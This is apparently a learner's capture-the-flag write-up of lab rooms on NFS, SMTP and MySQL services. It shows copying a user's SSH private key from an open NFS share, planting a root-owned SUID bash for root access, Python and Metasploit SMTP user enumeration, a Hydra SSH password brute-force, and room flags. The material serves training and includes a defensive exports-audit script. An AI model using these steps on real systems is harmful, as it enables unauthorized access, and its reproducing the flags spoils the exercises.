This is the second part of my notes on the Network Services rooms in the Network Exploitation Basics module of the Complete Beginner path. I learned a lot, and a lot of new protocols and tools were introduced.
NFS
Understanding NFS
What does NFS stand for?
Network File System
What process allows an NFS client to interact with a remote directory as though it was a physical drive?
Mounting
By using NFS, users and programs can access files on remote systems as if they were local files. It does this by mounting all, or a portion of a file system on a server. The portion of the file system that is mounted can be accessed by clients with whatever privileges are assigned to each file.
What does NFS use to represent files and directories on the server?
file handle
The server checks if the user has permission to mount whatever directory has been requested. It will then return a file handle which uniquely identifies each file and directory that is on the server.
What protocol does NFS use to communicate between the server and client?
RPC
What two pieces of user data does the NFS server take as parameters for controlling user permissions? Format: parameter 1/parameter 2
user id / group id
Can a Windows NFS server share files with a Linux client? (Y/N)
Y
Can a Linux NFS server share files with a MacOS client? (Y/N)
Y
Using the NFS protocol, you can transfer files between computers running Windows and other non-Windows operating systems, such as Linux, MacOS or Unix.
A computer running Windows Server can act as an NFS file server for other non-Windows client computers. Likewise, NFS allows a Windows-based computer running Windows server to access files stored on a non-Windows NFS server.
What is the latest version of NFS? [released in 2016, but is still up to date as of 2020] This will require external research.
4.2
Enumerating NFS
Requirements
In order to do a more advanced enumeration of the NFS server, and shares – we’re going to need a few tools.
nfs-common
It is important to have this package installed on any machine that uses NFS, either as client or server. It includes programs such as lockd, statd, showmount, nfsstat, gssd, idmapd and mount.nfs. Primarily we are concerned with showmount and mount.nfs, as these are the most useful for extracting information from the NFS share.
Port Scanning
Mounting NFS shares
Your client needs a directory where the content shared by the server in its export can be accessed. You can create this mount point anywhere on your system. Once you have created it, use the mount command to attach the NFS share to it, like so:
sudo mount -t nfs IP:share /tmp/mount/ -nolock
- sudo: run as root
- mount: execute the mount command
- -t nfs: the type of filesystem to mount, here NFS
- IP:share: the IP address of the NFS server and the exported path we wish to mount
- -nolock: do not use NLM (Network Lock Manager) locking
One caveat on the last flag: the canonical spelling is -o nolock. A single-dash -nolock is parsed by mount as the separate flags -n (skip /etc/mtab) and -o lock, so it does not actually disable locking. It is kept here because it is what the room uses and the mount still succeeds.
Conduct a thorough port scan of your choosing, how many ports are open?
7
PORT      STATE SERVICE  REASON         VERSION
22/tcp    open  ssh      syn-ack ttl 64 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 73:92:8e:04:de:40:fb:9c:90:f9:cf:42:70:c8:45:a7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDEQIafB/d+8xhCVa/WJUjV/xtzU7h9fmdPMEVWEobVN59eusBnBD19rp08xrjFOkvHdLSe3XCaDSSreOd4m9If73vzGT/dpXO4kj2Je+p2ALDLLr0vbA+/EVrFJjsbKJ6OLNWGw2nD6romEld++MLOI0SbY9zaM3ov4hwQZ2Fnp9QF5OAt3zqIyxk5Xr99gpm/i4mk3YtA+3I1WHpdLE5Uw41aOVYapowLh+sG1Uyi8dxnI7WJ04DywrUftJam/ajlY6QAiWDR96QRw7RuNJ+8dOLDj7JT+aNREvSTrSWahn+clpIwCgDuVUYy36BEfyTpC/JyTtuS077Bj8vv8NLl
|   256 6d:63:d6:b8:0a:67:fd:86:f1:22:30:2b:2d:27:1e:ff (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIL2RAJwSBEjlVNFa6km4BnXrbfxBqanFGsc8V7KPraGwGaJkBCtaUpVRQmPXQHhNePswl4UI2rsxVLcw/DYQ4s=
|   256 bd:08:97:79:63:0f:80:7c:7f:e8:50:dc:59:cf:39:5e (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINqYlGyJzySWsOMejWbc9mf3mFzerVbrty8i6PCOR7lv
111/tcp   open  rpcbind  syn-ack ttl 64 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4      111/tcp     rpcbind
|   100000  2,3,4      111/udp     rpcbind
|   100003  3          2049/udp    nfs
|   100003  3,4        2049/tcp    nfs
|   100005  1,2,3      52691/tcp   mountd
|   100005  1,2,3      57133/udp   mountd
|   100021  1,3,4      34475/tcp   nlockmgr
|   100021  1,3,4      48911/udp   nlockmgr
|   100227  3          2049/tcp    nfs_acl
|_  100227  3          2049/udp    nfs_acl
2049/tcp  open  nfs_acl  syn-ack ttl 64 3 (RPC #100227)
34475/tcp open  nlockmgr syn-ack ttl 64 1-4 (RPC #100021)
46359/tcp open  mountd   syn-ack ttl 64 1-3 (RPC #100005)
52691/tcp open  mountd   syn-ack ttl 64 1-3 (RPC #100005)
56583/tcp open  mountd   syn-ack ttl 64 1-3 (RPC #100005)
Which port contains the service we’re looking to enumerate?
2049
|   100003  3          2049/udp    nfs
|   100003  3,4        2049/tcp    nfs
Now, use /usr/sbin/showmount -e [IP] to list the NFS shares. What is the name of the visible share?
/home
root@ip-10-10-87-146:~# /usr/sbin/showmount -e 10.10.14.167
Export list for 10.10.14.167:
/home *
Time to mount the share to our local machine!
First, use mkdir /tmp/mount to create a directory on your machine to mount the share to. This is in the /tmp directory, so be aware that it will be removed on restart.
Then, use the mount command we broke down earlier to mount the NFS share to your local machine. Change directory to where you mounted the share – what is the name of the folder inside?
cappucino
root@ip-10-10-87-146:~# mkdir /tmp/mount
root@ip-10-10-87-146:~# sudo mount -t nfs 10.10.14.167:home /tmp/mount/ -nolock
root@ip-10-10-87-146:~# cd /tmp/mount
root@ip-10-10-87-146:/tmp/mount# ls
cappucino
Have a look inside the directory, look at the files. Looks like we’re inside a user’s home directory…
Interesting! Let’s do a bit of research now, have a look through the folders. Which of these folders could contain keys that would give us remote access to the server?
.ssh
root@ip-10-10-87-146:/tmp/mount/cappucino# ls
root@ip-10-10-87-146:/tmp/mount/cappucino# ls -al
total 36
drwxr-xr-x 5 ubuntu ubuntu 4096 Jun  4  2020 .
drwxr-xr-x 3 root   root   4096 Apr 21  2020 ..
-rw------- 1 ubuntu ubuntu    5 Jun  4  2020 .bash_history
-rw-r--r-- 1 ubuntu ubuntu  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 ubuntu ubuntu 3771 Apr  4  2018 .bashrc
drwx------ 2 ubuntu ubuntu 4096 Apr 22  2020 .cache
drwx------ 3 ubuntu ubuntu 4096 Apr 22  2020 .gnupg
-rw-r--r-- 1 ubuntu ubuntu  807 Apr  4  2018 .profile
drwx------ 2 ubuntu ubuntu 4096 Apr 22  2020 .ssh
-rw-r--r-- 1 ubuntu ubuntu    0 Apr 22  2020 .sudo_as_admin_successful
Which of these keys is most useful to us?
id_rsa
id_rsa is the default name of an SSH identity file.
Copy this file to a different location on your local machine, and change its permissions to 600 using chmod 600 [file].
Assuming we were right about what type of directory this is, we can pretty easily work out the name of the user this key corresponds to.
Can we log into the machine using ssh -i <key-file> <username>@<ip>? (Y/N)
Y
root@ip-10-10-233-18:~# cp /tmp/mount/cappucino/.ssh/id_rsa ~
root@ip-10-10-233-18:~# ls
burp.json   Desktop    id_rsa        Pictures  Rooms    thinclient_drives
CTFBuilder  Downloads  Instructions  Postman   Scripts  Tools
root@ip-10-10-233-18:~# chmod 600 id_rsa
root@ip-10-10-233-18:~# ssh -i id_rsa cappucino@10.10.14.167
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Jun 25 05:47:40 UTC 2024

  System load:  0.0               Processes:           102
  Usage of /:   45.2% of 9.78GB   Users logged in:     0
  Memory usage: 16%               IP address for eth0: 10.10.14.167
  Swap usage:   0%

44 packages can be updated.
0 updates are security updates.

Last login: Thu Jun  4 14:37:50 2020
cappucino@polonfs:~$
Exploiting NFS
What is root_squash?
By default, NFS exports have root squashing enabled (root_squash): a client connecting as root is mapped to an unprivileged account (nfsnobody, or nobody on many modern distributions), so remote root has no special rights on the exported volume. Not what we want. If the export is configured with no_root_squash instead, the client's root keeps uid 0 on the share, so it can create root-owned files and set the SUID bit on them, which hands a remote user root on the server as soon as that file is executed there.
SUID
So, what are files with the SUID bit set? Essentially, such a file runs with the privileges of its owner (or, for SGID, its group) rather than those of the user who executes it. In this case the owner will be the super-user. We can leverage this to get a shell with those privileges!
For compatibility reasons, we will obtain the bash executable directly from the target machine (a binary built for the attacking distribution may expect a different glibc). With the key obtained in the previous task, we can use SCP to download it onto our attacking machine: scp -i key_name username@10.10.14.167:/bin/bash ~/Downloads/bash
Here’s a step by step of the actions we’re taking, and how they all tie together to allow us to gain a root shell:
- NFS Access
- Gain Low Privilege Shell
- Upload Bash Executable to the NFS share
- Set SUID Permissions Through NFS Due To Misconfigured Root Squash
- Login Through SSH
- Execute SUID Bit Bash Executable
- Root Access
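Before carrying the steps out, here is the server-side view of the misconfiguration this section abuses. This is an added example, not part of the room or of the original write-up: a small Python audit of /etc/exports syntax that applies the exportfs defaults and flags exports where a client's root keeps uid 0. The sample exports file is constructed (the first line is how /home would have to be exported for the chown/chmod steps to succeed), and the finding codes and messages are my own.

```python
import re
from dataclasses import dataclass, field
from typing import List, Tuple

# exportfs defaults when an option is absent (see exports(5)); these are the
# option pairs that decide whether a client's root keeps uid 0 on the share.
PAIRS = (("rw", "ro"), ("no_root_squash", "root_squash"),
         ("insecure", "secure"), ("all_squash", "no_all_squash"))
DEFAULTS = {"ro", "root_squash", "secure", "no_all_squash"}

MESSAGES = {
    "no_root_squash": "client root keeps uid 0: can chown to root and set SUID bits on the share",
    "world": "exported to every host (no client restriction)",
    "insecure": "accepts requests from unprivileged source ports, so any local user on a "
                "permitted client can speak NFS and forge uids",
    "critical_combo": "rw + no_root_squash + world: anyone can plant a root-owned SUID binary",
}


@dataclass
class Export:
    path: str
    client: str                                   # host, network, wildcard, or "*" for everyone
    options: List[str] = field(default_factory=list)


def parse_exports(text: str) -> List[Export]:
    """Parse /etc/exports syntax: '<path> <client>(<opts>) <client>(<opts>) ...'.

    A space between the client and its parenthesis, as in 'host (rw)', is the
    classic mistake: exportfs reads 'host' with default options plus '(rw)' for
    *everyone*. The parser reproduces that so the audit can flag it.
    """
    exports: List[Export] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()        # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        path, tokens = parts[0], parts[1:] or ["*"]   # a bare path also means everyone
        for tok in tokens:
            m = re.fullmatch(r"([^()]*)(?:\(([^()]*)\))?", tok)
            if not m:
                raise ValueError(f"unparseable export token: {tok!r}")
            client = m.group(1) or "*"
            opts = [o for o in (m.group(2) or "").split(",") if o]
            exports.append(Export(path, client, opts))
    return exports


def effective(options: List[str]) -> set:
    """Resolve the option pairs to what the server will actually do."""
    eff = set(DEFAULTS)
    for o in options:
        for a, b in PAIRS:
            if o in (a, b):
                eff -= {a, b}
                eff.add(o)
    return eff


def audit(exports: List[Export]) -> List[Tuple[str, str, str]]:
    """Return (path, client, finding-code) triples; an empty list means nothing noteworthy."""
    findings = []
    for e in exports:
        eff = effective(e.options)
        root_kept = "no_root_squash" in eff and "all_squash" not in eff
        if root_kept:
            findings.append((e.path, e.client, "no_root_squash"))
        if e.client == "*":
            findings.append((e.path, e.client, "world"))
        if "insecure" in eff:
            findings.append((e.path, e.client, "insecure"))
        if root_kept and "rw" in eff and e.client == "*":
            findings.append((e.path, e.client, "critical_combo"))
    return findings


# Constructed sample: line 1 is the room's /home export as it would have to be
# configured for the attack; line 2 shows the space-before-parenthesis gotcha;
# line 3 is a correctly restricted read-only export.
SAMPLE_EXPORTS = """\
/home      *(rw,no_root_squash)
/srv/data  10.10.14.0/24 (rw,no_root_squash)   # meant for one subnet only
/srv/pub   10.10.14.5(ro)
"""

if __name__ == "__main__":
    for path, client, code in audit(parse_exports(SAMPLE_EXPORTS)):
        print(f"{path:10} {client:16} {code:15} {MESSAGES[code]}")
```

Two things worth knowing from the defender's side: showmount -e only shows the client list, not the squash options, so from the client the real test is whether chown root on a fresh file in the mount succeeds; and the second sample line shows the space-before-parenthesis mistake, which exportfs warns about because it silently exports the path read-write to everyone.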
First, change directory to the mount point on your machine, where the NFS share should still be mounted, and then into the user’s home directory.
root@ip-10-10-233-18:/tmp/mount/cappucino#
Download the bash executable to your Downloads directory. Then use "cp ~/Downloads/bash ." to copy it onto the NFS share. The copied bash binary must be owned by root, which you set with "sudo chown root bash". This chown is exactly what root_squash would normally prevent: it only succeeds because the export lets the client's root keep uid 0.
root@ip-10-10-233-18:/tmp/mount/cappucino/.ssh# scp -i id_rsa cappucino@10.10.14.167:/bin/bash ~/Downloads/bash
bash                                          100% 1087KB  85.0MB/s   00:00
root@ip-10-10-233-18:/tmp/mount/cappucino/.ssh# cd ..
root@ip-10-10-233-18:/tmp/mount/cappucino# ls
root@ip-10-10-233-18:/tmp/mount/cappucino# ls -al
total 36
drwxr-xr-x 5 ubuntu ubuntu 4096 Jun  4  2020 .
drwxr-xr-x 3 root   root   4096 Apr 21  2020 ..
-rw------- 1 ubuntu ubuntu   20 Jun 25 07:00 .bash_history
-rw-r--r-- 1 ubuntu ubuntu  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 ubuntu ubuntu 3771 Apr  4  2018 .bashrc
drwx------ 2 ubuntu ubuntu 4096 Apr 22  2020 .cache
drwx------ 3 ubuntu ubuntu 4096 Apr 22  2020 .gnupg
-rw-r--r-- 1 ubuntu ubuntu  807 Apr  4  2018 .profile
drwx------ 2 ubuntu ubuntu 4096 Apr 22  2020 .ssh
-rw-r--r-- 1 ubuntu ubuntu    0 Apr 22  2020 .sudo_as_admin_successful
root@ip-10-10-233-18:/tmp/mount/cappucino# cp ~/Downloads/bash .
root@ip-10-10-233-18:/tmp/mount/cappucino# ls
bash
root@ip-10-10-233-18:/tmp/mount/cappucino# sudo chown root bash
Now, we're going to add the SUID bit to the bash executable we just copied to the share using sudo chmod +[permission] bash. What letter do we use to set the SUID bit with chmod?
s
The letter s is used to set the setuid (SUID) bit with the chmod command in Linux:
- chmod u+s </path/to/the/file>: sets the setuid bit symbolically
- chmod u-s </path/to/the/file>: removes it
Note that chmod +s with no u or g prefix sets both the setuid and the setgid bit, which is why the listing below ends in -rwsr-sr-x rather than -rwsr-xr-x.
Let's do a sanity check: check the permissions of the bash executable using ls -la bash. What does the permission set look like? Make sure that it ends with -sr-x.
-rwsr-sr-x
root@ip-10-10-233-18:/tmp/mount/cappucino# sudo chmod +s bash
root@ip-10-10-233-18:/tmp/mount/cappucino# ls -la bash
-rwsr-sr-x 1 root root 1113504 Jun 25 07:04 bash
Now, SSH into the machine as the user. List the directory to make sure the bash executable is there. Now, the moment of truth. Run it with "./bash -p". The -p (privileged mode) flag matters: when bash starts with an effective UID that differs from the real UID, it resets the effective UID to the real one unless -p is given, which would throw the SUID privilege away before you got a prompt.
Great! If all’s gone well you should have a shell as root! What’s the root flag?
THM{nfs_got_pwned}
cappucino@polonfs:~$ ls
bash
cappucino@polonfs:~$ ./bash -p
bash-4.4# whoami
root
bash-4.4# ls /root
root.txt
bash-4.4# cat /root/root.txt
THM{nfs_got_pwned}
bash-4.4#
SMTP (Simple Mail Transfer Protocol)
Understanding SMTP
The SMTP server performs three basic functions:
- It verifies who is sending emails through the SMTP server.
- It sends the outgoing mail
- If the outgoing mail can’t be delivered it sends the message back to the sender.
POP and IMAP
POP (Post Office Protocol) and IMAP (Internet Message Access Protocol) are both email protocols responsible for transferring email between a client and a mail server. The main difference is that POP takes the simpler approach of downloading the inbox from the mail server to the client, whereas IMAP keeps the client's view synchronised with the mailbox on the server, downloading anything new.
What does SMTP stand for?
Simple Mail Transfer Protocol
What does SMTP handle the sending of?
emails
What is the first step in the SMTP process?
SMTP handshake
What is the default SMTP port?
25
Where does the SMTP server send the email if the recipient's server is not available?
SMTP Queue
On what server does the Email ultimately end up on?
POP/IMAP
Can a Linux machine run an SMTP server?
Y
Can a Windows machine run an SMTP server?
Y
Enumerating SMTP
Poorly configured or vulnerable mail servers can often provide an initial foothold into a network. We want to fingerprint the server to make our targeting as precise as possible before launching an attack. We can use the smtp_version module in Metasploit.
The SMTP service has two commands that allow the enumeration of users: VRFY (confirms whether a mailbox name is valid) and EXPN (expands a mailing list or alias into the actual addresses behind it). We can do this manually over a telnet or netcat connection; however, Metasploit provides a handy module called smtp_enum that does the legwork for us, falling back to RCPT TO probing when VRFY is disabled.
First, let’s run a port scan against the target machine, same as last time. What port is SMTP running on?
25
root@ip-10-10-35-22:~# nmap -sV 10.10.54.3

Starting Nmap 7.60 ( https://nmap.org ) at 2024-06-26 03:31 BST
Nmap scan report for ip-10-10-54-3.eu-west-1.compute.internal (10.10.54.3)
Host is up (0.00069s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
25/tcp open  smtp    Postfix smtpd
MAC Address: 02:4B:FA:CD:BD:EB (Unknown)
Service Info: Host: polosmtp.home; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.53 seconds
Okay, now we know what port we should be targeting, let’s start up Metasploit. What command do we use to do this?
msfconsole
Let’s search for the module smtp_version, what’s its full module name?
auxiliary/scanner/smtp/smtp_version
msf6 > search smtp_version

Matching Modules
================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  auxiliary/scanner/smtp/smtp_version                   normal  No     SMTP Banner Grabber


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smtp/smtp_version
Great, now select the module and list the options. How do we do this?
options
msf6 > use 0
msf6 auxiliary(scanner/smtp/smtp_version) > options

Module options (auxiliary/scanner/smtp/smtp_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    25               yes       The target port (TCP)
   THREADS  1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.
Have a look through the options, does everything seem correct? What is the option we need to set?
RHOSTS
Set that to the correct value for your target machine. Then run the exploit. What’s the system mail name?
polosmtp.home
msf6 auxiliary(scanner/smtp/smtp_version) > set rhosts 10.10.54.3
rhosts => 10.10.54.3
msf6 auxiliary(scanner/smtp/smtp_version) > run

[+] 10.10.54.3:25 - 10.10.54.3:25 SMTP 220 polosmtp.home ESMTP Postfix (Ubuntu)\x0d\x0a
[*] 10.10.54.3:25 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
What Mail Transfer Agent (MTA) is running the SMTP server? This will require some external research.
Postfix
Good! We've now got a good amount of information on the target system to move onto the next stage. Let's search for the module smtp_enum, what is the full module name?
auxiliary/scanner/smtp/smtp_enum
msf6 auxiliary(scanner/smtp/smtp_version) > search smtp_enum

Matching Modules
================

   #  Name                              Disclosure Date  Rank    Check  Description
   -  ----                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/smtp/smtp_enum                   normal  No     SMTP User Enumeration Utility


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smtp/smtp_enum

msf6 auxiliary(scanner/smtp/smtp_version) >
We're going to be using the top-usernames-shortlist.txt wordlist from the Usernames subsection of SecLists (/usr/share/wordlists/SecLists/Usernames if you have it installed).
SecLists is an amazing collection of wordlists. If you're running Kali or Parrot you can install it with: sudo apt install seclists
What option do we need to set to the wordlist’s path?
USER_FILE
msf6 auxiliary(scanner/smtp/smtp_enum) > options

Module options (auxiliary/scanner/smtp/smtp_enum):

   Name       Current Setting                                                          Required  Description
   ----       ---------------                                                          --------  -----------
   RHOSTS                                                                              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      25                                                                       yes       The target port (TCP)
   THREADS    1                                                                        yes       The number of concurrent threads (max one per host)
   UNIXONLY   true                                                                     yes       Skip Microsoft bannered servers when testing unix users
   USER_FILE  /opt/metasploit-framework/embedded/framework/data/wordlists/unix_users.txt  yes       The file that contains a list of probable users accounts.


View the full module info with the info, or info -d command.
Once we’ve set this option, what is the other essential parameter we need to set?
RHOSTS
msf6 auxiliary(scanner/smtp/smtp_enum) > set USER_FILE /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt
USER_FILE => /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt
msf6 auxiliary(scanner/smtp/smtp_enum) > set RHOSTS 10.10.54.3
RHOSTS => 10.10.54.3
msf6 auxiliary(scanner/smtp/smtp_enum) > run

[*] 10.10.54.3:25 - 10.10.54.3:25 Banner: 220 polosmtp.home ESMTP Postfix (Ubuntu)
[+] 10.10.54.3:25 - 10.10.54.3:25 Users found: administrator
[*] 10.10.54.3:25 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
What username is returned?
administrator
[+] 10.10.54.3:25 - 10.10.54.3:25 Users found: administrator
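For anyone curious what smtp_enum is doing under the hood to find administrator, here is an added example (my code, not the room's or Metasploit's) of the VRFY / RCPT TO dialogue in Python. Because it has to run offline, it includes a constructed FakePostfix class whose reply codes mirror Postfix; the user list, the "always252" mode, the canary username and the SocketTransport class are my own assumptions. Against the real target you would hand enumerate_users a SocketTransport instead of the fake.

```python
import re
import socket
from typing import List


class SocketTransport:
    """Talks to a real MTA: send one command, collect one (possibly multi-line) reply."""

    def __init__(self, host: str, port: int = 25, timeout: float = 5.0):
        self.sock = socket.create_connection((host, port), timeout)
        self.rfile = self.sock.makefile("rb")
        self.banner = self._reply()

    def _reply(self) -> str:
        lines = []
        while True:
            line = self.rfile.readline().decode("ascii", "replace").rstrip("\r\n")
            lines.append(line)
            if len(line) < 4 or line[3] != "-":       # "250-..." continues, "250 ..." ends
                return "\n".join(lines)

    def command(self, line: str) -> str:
        self.sock.sendall((line + "\r\n").encode("ascii"))
        return self._reply()


class FakePostfix:
    """Constructed stand-in for polosmtp.home so the logic can run offline.
    Reply codes follow Postfix; the user list and vrfy_mode are made up.
    vrfy_mode: "on" (normal), "off" (disable_vrfy_command=yes), or "always252"
    (server answers 252 to every VRFY and therefore reveals nothing)."""

    UNKNOWN = "550 5.1.1 <{}>: Recipient address rejected: User unknown in local recipient table"

    def __init__(self, users, vrfy_mode: str = "on"):
        self.users, self.vrfy_mode = set(users), vrfy_mode
        self.banner = "220 polosmtp.home ESMTP Postfix (Ubuntu)"
        self.log: List[str] = []                       # every command the client sent

    def command(self, line: str) -> str:
        self.log.append(line)
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            return "250 polosmtp.home"
        if verb in ("MAIL", "RSET"):
            return "250 2.0.0 Ok"
        if verb == "QUIT":
            return "221 2.0.0 Bye"
        if verb == "VRFY":
            if self.vrfy_mode == "off":
                return "502 5.5.1 VRFY command is disabled"
            if self.vrfy_mode == "always252" or arg in self.users:
                return f"252 2.0.0 {arg}"
            return self.UNKNOWN.format(arg)
        if verb == "RCPT":
            user = re.search(r"<([^@>]*)", arg).group(1)
            return "250 2.1.5 Ok" if user in self.users else self.UNKNOWN.format(user)
        return "502 5.5.2 Error: command not recognized"


def enumerate_users(t, candidates: List[str], sender: str = "probe@example.com") -> List[str]:
    """VRFY each candidate; fall back to MAIL FROM / RCPT TO when VRFY is disabled
    or answers 25x for a name that cannot exist (the false-positive trap)."""
    t.command("HELO enum.local")
    canary = t.command("VRFY zz_no_such_user_7f3a")     # made-up name used as a control
    use_vrfy = canary[:3] == "550"
    found = []
    for user in candidates:
        if use_vrfy:
            if t.command(f"VRFY {user}")[:3] in ("250", "252"):
                found.append(user)
            continue
        t.command("RSET")
        t.command(f"MAIL FROM:<{sender}>")
        if t.command(f"RCPT TO:<{user}>")[:3] == "250":
            found.append(user)
    t.command("QUIT")
    return found


if __name__ == "__main__":
    # Offline demo against the fake. Against the room target it would be:
    #   enumerate_users(SocketTransport("10.10.54.3"), candidates)
    candidates = ["admin", "administrator", "root", "test"]
    print(enumerate_users(FakePostfix(["administrator", "root"]), candidates))
```

The canary is the part worth copying. RFC 5321 lets a server answer 252 ("cannot VRFY user, but will accept message and attempt delivery") to everything, and some MTAs do, which would make every candidate look valid. Probing a name that cannot exist first tells you whether VRFY is informative at all; if it is not, RCPT TO after a MAIL FROM gives the same yes/no as long as the server rejects unknown local recipients at RCPT time, which Postfix does by default for its local domains.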
Exploiting SMTP
At the end of our Enumeration section we have a few vital pieces of information:
- A user account name
- The type of SMTP server and Operating System running.
We know from our port scan that the only other open port on this machine is an SSH login. We're going to use this information to try and brute-force the SSH password for our user using Hydra.
There is a wide array of customisability when it comes to using Hydra. Hydra primarily performs dictionary attacks; both Kali Linux and Parrot OS ship many different wordlists in the /usr/share/wordlists directory if you would like to browse for a different wordlist to the widely used rockyou.txt.
The syntax for the command we’re going to use to find the password is this:
hydra -t 16 -l USERNAME -P /usr/share/wordlists/rockyou.txt -vV 10.10.54.3 ssh
- hydra: runs the hydra tool
- -t 16: number of parallel connections per target
- -l [user]: the single username whose account you are trying to compromise
- -P [path to dictionary]: the file containing the list of candidate passwords
- -vV: very verbose, shows the login+pass combination for each attempt
- [machine ip]: the IP address of the target machine
- ssh / protocol: the service to attack
Note the warning Hydra prints below: OpenSSH caps concurrent unauthenticated connections (MaxStartups), so -t 4 is the safer choice. The run still completes here only because the password appears very early in rockyou.txt.
What is the password of the user we found during our enumeration stage?
alejandro
root@ip-10-10-35-22:~# hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vV 10.10.54.3 ssh
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2024-06-26 04:28:32
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://10.10.54.3:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://administrator@10.10.54.3:22
[INFO] Successful, password authentication is supported by ssh://10.10.54.3:22
[ATTEMPT] target 10.10.54.3 - login "administrator" - pass "123456" - 1 of 14344398 [child 0] (0/0)
[ATTEMPT] target 10.10.54.3 - login "administrator" - pass "12345" - 2 of 14344398 [child 1] (0/0)
...
[ATTEMPT] target 10.10.54.3 - login "administrator" - pass "killer" - 143 of 14344401 [child 11] (0/3)
[ATTEMPT] target 10.10.54.3 - login "administrator" - pass "sandra" - 144 of 14344401 [child 14] (0/3)
[ATTEMPT] target 10.10.54.3 - login "administrator" - pass "alejandro" - 145 of 14344401 [child 15] (0/3)
[ATTEMPT] target 10.10.54.3 - login "administrator" - pass "buster" - 146 of 14344401 [child 10] (0/3)
[ATTEMPT] target 10.10.54.3 - login "administrator" - pass "george" - 147 of 14344401 [child 4] (0/3)
[22][ssh] host: 10.10.54.3   login: administrator   password: alejandro
[STATUS] attack finished for 10.10.54.3 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Great! Now, let's SSH into the server as the user. What are the contents of smtp.txt?
THM{who_knew_email_servers_were_c00l?}
root@ip-10-10-35-22:~# ssh administrator@10.10.54.3
The authenticity of host '10.10.54.3 (10.10.54.3)' can't be established.
ECDSA key fingerprint is SHA256:ABheODwYmk63/Mmp8cbMSoVTNv3vcgWbzukZoGMb62I.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.54.3' (ECDSA) to the list of known hosts.
administrator@10.10.54.3's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-111-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Jun 26 03:31:06 UTC 2024

  System load:  0.01              Processes:           91
  Usage of /:   43.9% of 9.78GB   Users logged in:     0
  Memory usage: 15%               IP address for eth0: 10.10.54.3
  Swap usage:   0%

87 packages can be updated.
35 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Wed Apr 22 22:21:42 2020 from 192.168.1.110
administrator@polosmtp:~$ ls
dead.letter  Maildir  smtp.txt
administrator@polosmtp:~$ cat smtp.txt
THM{who_knew_email_servers_were_c00l?}
MySQL
Understanding MySQL
MySQL is a relational database management system (RDBMS) based on Structured Query Language (SQL).
MySQL, as an RDBMS, is made up of the server and utility programs that help in the administration of MySQL databases.
- MySQL creates a database for storing and manipulating data, defining the relationship of each table.
- Clients make requests by making specific statements in SQL.
- The server will respond to the client with whatever information has been requested.
What type of software is MySQL?
Relational Database Management System
What language is MySQL based on?
SQL
What communication model does MySQL use?
client-server
What is a common application of MySQL?
back end database
What major social network uses MySQL as their back-end database? This will require further research.
Facebook
Enumerating MySQL
Typically, you will have gained some initial credentials from enumerating other services that you can then use to enumerate and exploit the MySQL service. For the sake of the scenario, we're going to assume that we found the credentials "root:password" while enumerating subdomains of a web server. After trying the login against SSH unsuccessfully, you decide to try it against MySQL.
As always, let’s start out with a port scan, so we know what port the service we’re trying to attack is running on. What port is MySQL using?
3306
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
3306/tcp open  mysql   MySQL 5.7.29-0ubuntu0.18.04.1
Good, now we think we have a set of credentials. Let's double check that by manually connecting to the MySQL server with mysql -h [IP] -u [username] -p.
root@ip-10-10-35-22:~# mysql -h 10.10.151.196 -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
